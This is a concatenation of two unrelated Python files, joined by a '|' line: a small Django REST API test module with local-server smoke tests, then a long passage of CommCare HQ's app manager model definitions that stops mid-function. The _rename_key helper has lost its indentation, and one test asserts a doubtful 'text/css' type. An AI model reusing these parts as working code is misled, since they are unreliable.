resume tests
from rest_framework.test import APIRequestFactory
from rest_framework.test import APIClient
from django.test import TestCase
from .models import *
from django.contrib.auth.models import User
import urllib2
import unittest
BASEURL = "http://127.0.0.1:8000/api"
factory = APIRequestFactory()
client = APIClient()
class DBTests(TestCase):
    """Model-level tests that exercise the ORM directly (no HTTP)."""

    def setUp(self):
        user = User.objects.create()
        author = Author.objects.create(user=user, displayName="stephen")
        # keep a handle on the fixture so tests can look it up again
        self.post = Post.objects.create(author=author, title="cool post", content="cool content")

    def test_post_created(self):
        # Completes the truncated "def test" stub: verify the fixture row
        # from setUp round-trips through the database with its fields intact.
        post = Post.objects.get(pk=self.post.pk)
        self.assertEqual(post.title, "cool post")
        self.assertEqual(post.content, "cool content")
        self.assertEqual(post.author.displayName, "stephen")
class TestYourWebserver(unittest.TestCase):
    """HTTP smoke tests against a locally running API server.

    NOTE(review): these are integration tests -- they require the dev
    server at BASEURL to be up; they will error out otherwise.
    """

    # These were previously referenced as undefined globals, which raised
    # NameError at runtime.  TODO: replace the placeholders with real
    # fixture IDs.
    authorID = "1"
    postID = "1"

    def setUp(self, baseurl=BASEURL):
        self.baseurl = baseurl

    def test_user_post_list(self):
        url = self.baseurl + "/author/posts"
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")
        # NOTE(review): "text/css" looks wrong for a posts endpoint --
        # confirm the expected content type before trusting this assertion.
        self.assertTrue(req.info().gettype() == "text/css",
                        ("Bad mimetype for css! %s" % req.info().gettype()))

    def test_post_list(self):
        url = self.baseurl + "/posts"
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")

    def test_author_post_list(self):
        # was: "/author/" + authorID + "posts" -- missing '/' before "posts"
        url = self.baseurl + "/author/" + self.authorID + "/posts"
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")

    def test_post_detail(self):
        url = self.baseurl + "/post/" + self.postID
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")

    def test_user_list(self):
        # TODO: implement once the user list endpoint exists
        self.skipTest("not implemented")

    def test_user_detail(self):
        # TODO: implement once the user detail endpoint exists
        self.skipTest("not implemented")
# Allow running the test module directly: `python <module>.py`
if __name__ == '__main__':
    unittest.main()
|
# coding=utf-8
"""
Application terminology
For any given application, there are a number of different documents.
The primary application document is an instance of Application. This
document id is what you'll see in the URL on most app manager pages. Primary
application documents should have `copy_of == None` and `is_released ==
False`. When an application is saved, the field `version` is incremented.
When a user makes a build of an application, a copy of the primary
application document is made. These documents are the "versions" you see on
the deploy page. Each build document will have a different id, and the
`copy_of` field will be set to the ID of the primary application document.
Additionally, some attachments such as `profile.xml` and `suite.xml` will be
created and saved to the build doc (see `create_all_files`).
When a build is starred, this is called "releasing" the build. The parameter
`is_released` will be set to True on the build document.
You might also run into remote applications and applications copied to be
published on the exchange, but those are quite infrequent.
"""
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from urllib2 import urlopen
from urlparse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from dimagi.ext.couchdbkit import *
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from restkit.errors import ResourceError
from couchdbkit.resource import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.util.quickcache import quickcache
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
LocationXpath,
)
from corehq.apps.builds import get_default_build_spec
from dimagi.utils.couch.cache import cache_core
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.make_uuid import random_hex
from dimagi.utils.web import get_url_base, parse_int
import commcare_translations
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import HQMediaMixin
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.models import CouchUser
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
split_path,
save_xform,
ParentCasePropertyBuilder,
is_usercase_in_use,
actions_use_usercase,
update_unique_ids,
app_callout_templates,
xpath_references_case,
xpath_references_user_case,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from .exceptions import (
AppEditingError,
BlankXFormError,
ConflictingCaseTypeError,
FormNotFoundException,
IncompatibleFormTypeException,
LocationXpathValidationError,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
CaseXPathValidationError,
UserCaseXPathValidationError,
)
from corehq.apps.reports.daterange import get_daterange_start_end_dates
from jsonpath_rw import jsonpath, parse
# Post-form workflow options: where the app navigates after a form is submitted.
WORKFLOW_DEFAULT = 'default'  # go to the app main screen
WORKFLOW_ROOT = 'root'  # go to the module select screen
WORKFLOW_PARENT_MODULE = 'parent_module'  # go to the parent module's screen
WORKFLOW_MODULE = 'module'  # go to the current module's screen
WORKFLOW_PREVIOUS = 'previous_screen'  # go to the previous screen (prior to entering the form)
WORKFLOW_FORM = 'form'  # go straight to another form
ALL_WORKFLOWS = [
    WORKFLOW_DEFAULT,
    WORKFLOW_ROOT,
    WORKFLOW_PARENT_MODULE,
    WORKFLOW_MODULE,
    WORKFLOW_PREVIOUS,
    WORKFLOW_FORM,
]
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
FIELD_SEPARATOR = ':'
ATTACHMENT_REGEX = r'[^/]*\.xml'
# HQ logo slug -> CommCare profile property name
ANDROID_LOGO_PROPERTY_MAPPING = {
    'hq_logo_android_home': 'brand-banner-home',
    'hq_logo_android_login': 'brand-banner-login',
}
def jsonpath_update(datum_context, value):
    """Set the value of a jsonpath-matched field in place.

    `datum_context` is a jsonpath_rw DatumInContext whose path must end in a
    single field; that field is reassigned on the parent object's value.
    """
    field = datum_context.path.fields[0]
    parent = jsonpath.Parent().find(datum_context)[0]
    parent.value[field] = value
# store a list of references to form ID's so that
# when an app is copied we can update the references
# with the new values
# (populated as a side effect of each FormIdProperty call below)
form_id_references = []
# PascalCase despite being a function: it is a property factory used like the
# couchdbkit Property classes.
def FormIdProperty(expression, **kwargs):
    """
    Create a StringProperty that references a form ID. This is necessary because
    form IDs change when apps are copied so we need to make sure we update
    any references to them.
    :param expression: jsonpath expression that can be used to find the field
    :param kwargs: arguments to be passed to the underlying StringProperty
    :return: a plain StringProperty; the expression is recorded in the
        module-level ``form_id_references`` registry as a side effect
    """
    path_expression = parse(expression)
    assert isinstance(path_expression, jsonpath.Child), "only child path expressions are supported"
    field = path_expression.right
    assert len(field.fields) == 1, 'path expression can only reference a single field'
    form_id_references.append(path_expression)
    return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
@memoized
def load_app_template(slug):
    """Load (and cache) a template app definition from static JSON by slug."""
    path = os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'json', 'template_apps')
    with open(os.path.join(path, slug + '.json')) as f:
        return json.load(f)
@memoized
def load_case_reserved_words():
    """Load (and cache) the list of case property names reserved by CommCare."""
    with open(os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'json', 'case-reserved-words.json')) as f:
        return json.load(f)
@memoized
def load_form_template(filename):
    """Load (and cache) a form template from this package's data directory."""
    with open(os.path.join(os.path.dirname(__file__), 'data', filename)) as f:
        return f.read()
class IndexedSchema(DocumentSchema):
    """
    Abstract class.
    Meant for documents that appear in a list within another document
    and need to know their own position within that list.
    """
    def with_id(self, i, parent):
        # Attach positional context; returns self so calls can be chained.
        self._i = i
        self._parent = parent
        return self
    @property
    def id(self):
        return self._i
    def __eq__(self, other):
        # NOTE(review): __eq__ without __hash__ is fine on Python 2 (default
        # hash retained) but would make instances unhashable on Python 3.
        return other and (self.id == other.id) and (self._parent == other._parent)
    class Getter(object):
        # Descriptor that, when accessed on an instance, acts like a bound
        # method yielding each item of a list property with its index
        # attached via with_id().
        def __init__(self, attr):
            self.attr = attr
        def __call__(self, instance):
            items = getattr(instance, self.attr)
            l = len(items)
            for i, item in enumerate(items):
                # i % l is a no-op here: enumerate only yields i < l
                yield item.with_id(i % l, instance)
        def __get__(self, instance, owner):
            # thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
            # this makes Getter('foo') act like a bound method
            # (three-argument MethodType is Python 2 only)
            return types.MethodType(self, instance, owner)
class FormActionCondition(DocumentSchema):
    """
    The condition under which to open/update/close a case/referral
    Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
    in which case the action takes place if question has answer answer,
    or {'type': 'always'} in which case the action always takes place.
    """
    type = StringProperty(choices=["if", "always", "never"], default="never")
    question = StringProperty()
    answer = StringProperty()
    operator = StringProperty(choices=['=', 'selected'], default='=')
    def is_active(self):
        # 'never' (the default) deactivates the owning action entirely
        return self.type in ('if', 'always')
class FormAction(DocumentSchema):
    """
    Corresponds to Case XML
    """
    condition = SchemaProperty(FormActionCondition)

    def is_active(self):
        return self.condition.is_active()

    @classmethod
    def get_action_paths(cls, action):
        """Yield every question path the action references: the condition's
        question (for 'if' conditions) plus all property value paths."""
        if action.condition.type == 'if':
            yield action.condition.question
        for __, path in cls.get_action_properties(action):
            yield path

    @classmethod
    def get_action_properties(cls, action):
        """Yield (case_property_name, question_path) pairs for whichever of
        the known property attributes the concrete action class defines.

        (The first parameter was previously misnamed ``self`` despite the
        ``@classmethod`` decorator.)
        """
        action_properties = action.properties()
        if 'name_path' in action_properties and action.name_path:
            yield 'name', action.name_path
        if 'case_name' in action_properties:
            yield 'name', action.case_name
        if 'external_id' in action_properties and action.external_id:
            yield 'external_id', action.external_id
        if 'update' in action_properties:
            for name, path in action.update.items():
                yield name, path
        if 'case_properties' in action_properties:
            for name, path in action.case_properties.items():
                yield name, path
        if 'preload' in action_properties:
            # preload maps question path -> case property, hence the swap
            for path, name in action.preload.items():
                yield name, path
class UpdateCaseAction(FormAction):
    # case property name -> question path to save from
    # (see FormAction.get_action_properties, which yields update.items() as
    # (name, path) pairs)
    update = DictProperty()
class PreloadAction(FormAction):
    # question path -> case property name to preload from
    # (see FormAction.get_action_properties, which iterates preload.items()
    # as (path, name) pairs)
    preload = DictProperty()
    def is_active(self):
        # active only when at least one preload mapping is configured
        return bool(self.preload)
class UpdateReferralAction(FormAction):
    followup_date = StringProperty()
    def get_followup_date(self):
        """Return an xpath expression for the referral follow-up date; falls
        back to two days from today when unset or already in the past."""
        if self.followup_date:
            return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
                followup_date=self.followup_date,
            )
        return self.followup_date or "date(today() + 2)"
class OpenReferralAction(UpdateReferralAction):
    # question path supplying the referral name
    name_path = StringProperty()
class OpenCaseAction(FormAction):
    # question paths supplying the new case's name and external id
    name_path = StringProperty()
    external_id = StringProperty()
class OpenSubCaseAction(FormAction):
    """Opens a subcase indexed against the form's case."""
    case_type = StringProperty()
    case_name = StringProperty()
    reference_id = StringProperty()
    # case property name -> question path
    case_properties = DictProperty()
    # presumably the repeat group the subcase is opened from -- TODO confirm
    repeat_context = StringProperty()
    # relationship = "child" for index to a parent case (default)
    # relationship = "extension" for index to a host case
    relationship = StringProperty(choices=['child', 'extension'], default='child')
    close_condition = SchemaProperty(FormActionCondition)
class FormActions(DocumentSchema):
    """All the case/referral actions configured on a (basic) form."""
    open_case = SchemaProperty(OpenCaseAction)
    update_case = SchemaProperty(UpdateCaseAction)
    close_case = SchemaProperty(FormAction)
    open_referral = SchemaProperty(OpenReferralAction)
    update_referral = SchemaProperty(UpdateReferralAction)
    close_referral = SchemaProperty(FormAction)
    case_preload = SchemaProperty(PreloadAction)
    referral_preload = SchemaProperty(PreloadAction)
    load_from_form = SchemaProperty(PreloadAction)
    usercase_update = SchemaProperty(UpdateCaseAction)
    usercase_preload = SchemaProperty(PreloadAction)
    subcases = SchemaListProperty(OpenSubCaseAction)
    def all_property_names(self):
        """Every case property this form saves, preloads, or sets on subcases."""
        names = set()
        names.update(self.update_case.update.keys())
        names.update(self.case_preload.preload.values())
        for subcase in self.subcases:
            names.update(subcase.case_properties.keys())
        return names
class CaseIndex(DocumentSchema):
    """An index from one case to another (child->parent or extension->host)."""
    tag = StringProperty()
    reference_id = StringProperty(default='parent')
    relationship = StringProperty(choices=['child', 'extension'], default='child')
class AdvancedAction(IndexedSchema):
    """Base class for advanced-form case actions (see LoadUpdateAction and
    AdvancedOpenCaseAction)."""
    case_type = StringProperty()
    case_tag = StringProperty()
    case_properties = DictProperty()
    # case_indices = NotImplemented  -- subclasses must provide this attribute
    close_condition = SchemaProperty(FormActionCondition)
    # IndexedSchema.__eq__ compares list position; restore DocumentSchema's
    # equality semantics instead
    __eq__ = DocumentSchema.__eq__
    def get_paths(self):
        for path in self.case_properties.values():
            yield path
        if self.close_condition.type == 'if':
            yield self.close_condition.question
    def get_property_names(self):
        return set(self.case_properties.keys())
    @property
    def is_subcase(self):
        # relies on the subclass-provided case_indices
        return bool(self.case_indices)
    @property
    def form_element_name(self):
        return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
    """
    Configuration for auto-selecting a case.
    Attributes:
        value_source    Reference to the source of the value. For mode = fixture,
                        this represents the FixtureDataType ID. For mode = case
                        this represents the 'case_tag' for the case.
                        The modes 'user' and 'raw' don't require a value_source.
        value_key       The actual field that contains the case ID. Can be a case
                        index or a user data key or a fixture field name or the raw
                        xpath expression. Always required.
    """
    mode = StringProperty(choices=[AUTO_SELECT_USER,
                                   AUTO_SELECT_FIXTURE,
                                   AUTO_SELECT_CASE,
                                   AUTO_SELECT_USERCASE,
                                   AUTO_SELECT_RAW])
    value_source = StringProperty()
    value_key = StringProperty(required=True)
class LoadUpdateAction(AdvancedAction):
    """
    details_module: Use the case list configuration from this module to show the cases.
    preload: Value from the case to load into the form. Keys are question paths, values are case properties.
    auto_select: Configuration for auto-selecting the case
    show_product_stock: If True list the product stock using the module's Product List configuration.
    product_program: Only show products for this CommCare Supply program.
    """
    details_module = StringProperty()
    preload = DictProperty()
    auto_select = SchemaProperty(AutoSelectCase, default=None)
    show_product_stock = BooleanProperty(default=False)
    product_program = StringProperty()
    case_index = SchemaProperty(CaseIndex)
    @property
    def case_indices(self):
        # Allows us to ducktype AdvancedOpenCaseAction
        # (at most one index; empty list when no tag is set)
        return [self.case_index] if self.case_index.tag else []
    @case_indices.setter
    def case_indices(self, value):
        if len(value) > 1:
            raise ValueError('A LoadUpdateAction cannot have more than one case index')
        if value:
            self.case_index = value[0]
        else:
            self.case_index = CaseIndex()
    @case_indices.deleter
    def case_indices(self):
        self.case_index = CaseIndex()
    def get_paths(self):
        # preload keys are question paths (values are case properties)
        for path in super(LoadUpdateAction, self).get_paths():
            yield path
        for path in self.preload.keys():
            yield path
    def get_property_names(self):
        names = super(LoadUpdateAction, self).get_property_names()
        names.update(self.preload.values())
        return names
    @property
    def case_session_var(self):
        return 'case_id_{0}'.format(self.case_tag)
    @classmethod
    def wrap(cls, data):
        # Migration: fold the legacy parent_tag / parent_reference_id /
        # relationship fields into a single CaseIndex document.
        if 'parent_tag' in data:
            if data['parent_tag']:
                data['case_index'] = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
    """Opens a new case from an advanced form, optionally indexed against
    other cases in the session."""
    name_path = StringProperty()
    repeat_context = StringProperty()
    case_indices = SchemaListProperty(CaseIndex)
    open_condition = SchemaProperty(FormActionCondition)
    def get_paths(self):
        for path in super(AdvancedOpenCaseAction, self).get_paths():
            yield path
        yield self.name_path
        if self.open_condition.type == 'if':
            yield self.open_condition.question
    @property
    def case_session_var(self):
        return 'case_id_new_{}_{}'.format(self.case_type, self.id)
    @classmethod
    def wrap(cls, data):
        # Migration: legacy parent_tag / parent_reference_id / relationship
        # fields become an entry appended to case_indices.
        if 'parent_tag' in data:
            if data['parent_tag']:
                index = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
                if hasattr(data.get('case_indices'), 'append'):
                    data['case_indices'].append(index)
                else:
                    data['case_indices'] = [index]
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
    """Actions on an advanced form: cases to load/update and cases to open."""
    load_update_cases = SchemaListProperty(LoadUpdateAction)
    open_cases = SchemaListProperty(AdvancedOpenCaseAction)
    get_load_update_actions = IndexedSchema.Getter('load_update_cases')
    get_open_actions = IndexedSchema.Getter('open_cases')

    def get_all_actions(self):
        return itertools.chain(self.get_load_update_actions(), self.get_open_actions())

    def get_subcase_actions(self):
        return (a for a in self.get_all_actions() if a.case_indices)

    def get_open_subcase_actions(self, parent_case_type=None):
        """Yield open actions that have case indices, optionally filtered to
        those indexed against a case of `parent_case_type`."""
        for action in self.open_cases:
            if action.case_indices:
                if not parent_case_type:
                    yield action
                else:
                    if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
                           for case_index in action.case_indices):
                        yield action

    def get_case_tags(self):
        for action in self.get_all_actions():
            yield action.case_tag

    def get_action_from_tag(self, tag):
        return self.actions_meta_by_tag.get(tag, {}).get('action', None)

    @property
    def actions_meta_by_tag(self):
        return self._action_meta()['by_tag']

    @property
    def actions_meta_by_parent_tag(self):
        return self._action_meta()['by_parent_tag']

    @property
    def auto_select_actions(self):
        return self._action_meta()['by_auto_select_mode']

    @memoized
    def _action_meta(self):
        """Build (once) lookup tables of actions by tag, by parent tag, and
        by auto-select mode."""
        meta = {
            'by_tag': {},
            'by_parent_tag': {},
            'by_auto_select_mode': {
                AUTO_SELECT_USER: [],
                AUTO_SELECT_CASE: [],
                AUTO_SELECT_FIXTURE: [],
                AUTO_SELECT_USERCASE: [],
                AUTO_SELECT_RAW: [],
            }
        }

        def add_actions(action_type, action_list):
            # parameter was previously named `type`, shadowing the builtin
            for action in action_list:
                meta['by_tag'][action.case_tag] = {
                    'type': action_type,
                    'action': action
                }
                for parent in action.case_indices:
                    meta['by_parent_tag'][parent.tag] = {
                        'type': action_type,
                        'action': action
                    }
                if action_type == 'load' and action.auto_select and action.auto_select.mode:
                    meta['by_auto_select_mode'][action.auto_select.mode].append(action)

        add_actions('load', self.get_load_update_actions())
        add_actions('open', self.get_open_actions())
        return meta
class FormSource(object):
    """Descriptor exposing a form's XML source, stored as an app attachment
    named ``<unique_id>.xml``."""
    def __get__(self, form, form_cls):
        if not form:
            return self
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id
        # for backwards compatibility of really old apps
        try:
            old_contents = form['contents']
        except AttributeError:
            pass
        else:
            # migrate inline 'contents' into an attachment on first access
            app.lazy_put_attachment(old_contents, filename)
            del form['contents']
        try:
            source = app.lazy_fetch_attachment(filename)
        except ResourceNotFound:
            source = ''
        return source
    def __set__(self, form, value):
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id
        app.lazy_put_attachment(value, filename)
        # source changed: stale validation results must be recomputed
        form.validation_cache = None
        try:
            form.xmlns = form.wrapped_xform().data_node.tag_xmlns
        except Exception:
            # best-effort: unparseable XML simply clears the xmlns
            form.xmlns = None
class CachedStringProperty(object):
    """Descriptor that stores a string in the shared (Django) cache.

    ``key`` is a callable mapping the owning instance to its cache key.
    """

    def __init__(self, key):
        self.get_key = key

    def __get__(self, instance, owner):
        return self.get(self.get_key(instance))

    def __set__(self, instance, value):
        self.set(self.get_key(instance), value)

    @classmethod
    def get(cls, key):
        return cache.get(key)

    @classmethod
    def set(cls, key, value):
        one_week = 7 * 24 * 60 * 60
        cache.set(key, value, one_week)  # cache for 7 days
class ScheduleVisit(IndexedSchema):
    """
    due: Days after the anchor date that this visit is due
    starts: Days before the due date that this visit is valid from
    expires: Days after the due date that this visit is valid until (optional)
    repeats: Whether this is a repeat visit (one per form allowed)
    increment: Days after the last visit that the repeat visit occurs
    """
    due = IntegerProperty()
    starts = IntegerProperty()
    expires = IntegerProperty()
    repeats = BooleanProperty(default=False)
    increment = IntegerProperty()
    @property
    def id(self):
        """Visits are 1-based indexed"""
        # shift IndexedSchema's 0-based list position to a 1-based number
        _id = super(ScheduleVisit, self).id
        return _id + 1
class FormDatum(DocumentSchema):
    # name/xpath pair attached to a FormLink (see FormLink.datums)
    name = StringProperty()
    xpath = StringProperty()
class FormLink(DocumentSchema):
    """
    xpath: xpath condition that must be true in order to open next form
    form_id: id of next form to open
    datums: list of FormDatum (name/xpath) entries for the linked form
    """
    xpath = StringProperty()
    # FormIdProperty registers this path so the reference is rewritten when
    # an app is copied
    form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
    datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
    """
    enabled: Whether the schedule is enabled
    starts: Days after the anchor date that this schedule starts
    expires: Days after the anchor date that this schedule expires (optional)
    visits: List of visits in this schedule
    allow_unscheduled: Allow unscheduled visits in this schedule
    transition_condition: Condition under which we transition to the next phase
    termination_condition: Condition under which we terminate the whole schedule
    """
    enabled = BooleanProperty(default=True)
    starts = IntegerProperty()
    expires = IntegerProperty()
    allow_unscheduled = BooleanProperty(default=False)
    visits = SchemaListProperty(ScheduleVisit)
    get_visits = IndexedSchema.Getter('visits')
    transition_condition = SchemaProperty(FormActionCondition)
    termination_condition = SchemaProperty(FormActionCondition)
class CommentMixin(DocumentSchema):
    """
    Documentation comment for app builders and maintainers
    """
    comment = StringProperty(default='')
    @property
    def short_comment(self):
        """
        Trim comment to 500 chars (about 100 words)
        """
        # 497 chars + '...' keeps the truncated result at exactly 500
        return self.comment if len(self.comment) <= 500 else self.comment[:497] + '...'
class FormBase(DocumentSchema):
    """
    Part of a Managed Application; configuration for a form.
    Translates to a second-level menu on the phone
    """
    form_type = None
    # language code -> form name
    name = DictProperty(unicode)
    unique_id = StringProperty()
    show_count = BooleanProperty(default=False)
    xmlns = StringProperty()
    version = IntegerProperty()
    # XML source, stored as an app attachment (see the FormSource descriptor)
    source = FormSource()
    # cached validation outcome, stored in the shared cache keyed on app + form
    validation_cache = CachedStringProperty(
        lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
    )
    post_form_workflow = StringProperty(
        default=WORKFLOW_DEFAULT,
        choices=ALL_WORKFLOWS
    )
    auto_gps_capture = BooleanProperty(default=False)
    no_vellum = BooleanProperty(default=False)
    form_links = SchemaListProperty(FormLink)
    schedule_form_id = StringProperty()
    @classmethod
    def wrap(cls, data):
        # validation_cache is a descriptor, not a document field; drop any
        # copy of it that may have been persisted
        data.pop('validation_cache', '')
        if cls is FormBase:
            # dispatch to the concrete form class based on doc_type
            doc_type = data['doc_type']
            if doc_type == 'Form':
                return Form.wrap(data)
            elif doc_type == 'AdvancedForm':
                return AdvancedForm.wrap(data)
            else:
                try:
                    return CareplanForm.wrap(data)
                except ValueError:
                    raise ValueError('Unexpected doc_type for Form', doc_type)
        else:
            return super(FormBase, cls).wrap(data)
    @classmethod
    def get_form(cls, form_unique_id, and_app=False):
        """Look up a form (and optionally its app) by unique id.
        :raises XFormIdNotUnique: if more than one form matches
        :raises ResourceNotFound: if no form matches
        """
        try:
            d = Application.get_db().view(
                'app_manager/xforms_index',
                key=form_unique_id
            ).one()
        except MultipleResultsFound as e:
            raise XFormIdNotUnique(
                "xform id '%s' not unique: %s" % (form_unique_id, e)
            )
        if d:
            d = d['value']
        else:
            raise ResourceNotFound()
        # unpack the dict into variables app_id, module_id, form_id
        app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
        app = Application.get(app_id)
        form = app.get_form(unique_id)
        if and_app:
            return form, app
        else:
            return form
    def pre_delete_hook(self):
        # subclasses may override to clean up before deletion
        raise NotImplementedError()
    def pre_move_hook(self, from_module, to_module):
        """ Called before a form is moved between modules or to a different position """
        raise NotImplementedError()
    def wrapped_xform(self):
        return XForm(self.source)
    def validate_form(self):
        """Validate the form XML, caching the outcome.
        Cache protocol: '' means valid, a JSON blob reconstructs the
        XFormValidationError, None means not yet validated.
        :raises XFormValidationError: if the form is invalid
        """
        vc = self.validation_cache
        if vc is None:
            # formtranslate requires all attributes to be valid xpaths, but
            # vellum namespaced attributes aren't
            form = self.wrapped_xform()
            form.strip_vellum_ns_attributes()
            try:
                if form.xml is not None:
                    validate_xform(etree.tostring(form.xml),
                                   version=self.get_app().application_version)
            except XFormValidationError as e:
                validation_dict = {
                    "fatal_error": e.fatal_error,
                    "validation_problems": e.validation_problems,
                    "version": e.version,
                }
                vc = self.validation_cache = json.dumps(validation_dict)
            else:
                vc = self.validation_cache = ""
        if vc:
            try:
                raise XFormValidationError(**json.loads(vc))
            except ValueError:
                # corrupt cache entry: clear it and re-validate
                self.validation_cache = None
                return self.validate_form()
        return self
    def validate_for_build(self, validate_module=True):
        """Return a list of error dicts for this form (empty when buildable)."""
        errors = []
        try:
            module = self.get_module()
        except AttributeError:
            module = None
        meta = {
            'form_type': self.form_type,
            'module': module.get_module_info() if module else {},
            'form': {"id": self.id if hasattr(self, 'id') else None, "name": self.name}
        }
        xml_valid = False
        if self.source == '':
            errors.append(dict(type="blank form", **meta))
        else:
            try:
                _parse_xml(self.source)
                xml_valid = True
            except XFormException as e:
                errors.append(dict(
                    type="invalid xml",
                    message=unicode(e) if self.source else '',
                    **meta
                ))
            except ValueError:
                logging.error("Failed: _parse_xml(string=%r)" % self.source)
                raise
            else:
                try:
                    self.validate_form()
                except XFormValidationError as e:
                    error = {'type': 'validation error', 'validation_message': unicode(e)}
                    error.update(meta)
                    errors.append(error)
        if self.post_form_workflow == WORKFLOW_FORM:
            # form-to-form workflow requires at least one resolvable link
            if not self.form_links:
                errors.append(dict(type="no form links", **meta))
            for form_link in self.form_links:
                try:
                    self.get_app().get_form(form_link.form_id)
                except FormNotFoundException:
                    errors.append(dict(type='bad form link', **meta))
        # this isn't great but two of FormBase's subclasses have form_filter
        if hasattr(self, 'form_filter') and self.form_filter:
            is_valid, message = validate_xpath(self.form_filter, allow_case_hashtags=True)
            if not is_valid:
                error = {
                    'type': 'form filter has xpath error',
                    'xpath_error': message,
                }
                error.update(meta)
                errors.append(error)
        errors.extend(self.extended_build_validation(meta, xml_valid, validate_module))
        return errors
    def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
        """
        Override to perform additional validation during build process.
        """
        return []
    def get_unique_id(self):
        """
        Return unique_id if it exists, otherwise initialize it
        Does _not_ force a save, so it's the caller's responsibility to save the app
        """
        if not self.unique_id:
            self.unique_id = random_hex()
        return self.unique_id
    def get_app(self):
        return self._app
    def get_version(self):
        # fall back to the app version when the form has none of its own
        return self.version if self.version else self.get_app().version
    def add_stuff_to_xform(self, xform, build_profile_id=None):
        """Normalize the XForm for a build: restrict languages, set the
        default language, and stamp the version."""
        app = self.get_app()
        langs = app.get_build_langs(build_profile_id)
        xform.exclude_languages(langs)
        xform.set_default_language(langs[0])
        xform.normalize_itext()
        xform.strip_vellum_ns_attributes()
        xform.set_version(self.get_version())
    def render_xform(self, build_profile_id=None):
        xform = XForm(self.source)
        self.add_stuff_to_xform(xform, build_profile_id)
        return xform.render()
    @quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'])
    def get_questions(self, langs, include_triggers=False,
                      include_groups=False, include_translations=False):
        return XForm(self.source).get_questions(
            langs=langs,
            include_triggers=include_triggers,
            include_groups=include_groups,
            include_translations=include_translations,
        )
    @memoized
    def get_case_property_name_formatter(self):
        """Get a function that formats case property names
        The returned function requires two arguments
        `(case_property_name, data_path)` and returns a string.
        """
        try:
            valid_paths = {question['value']: question['tag']
                           for question in self.get_questions(langs=[])}
        except XFormException as e:
            # punt on invalid xml (sorry, no rich attachments)
            valid_paths = {}
        def format_key(key, path):
            if valid_paths.get(path) == "upload":
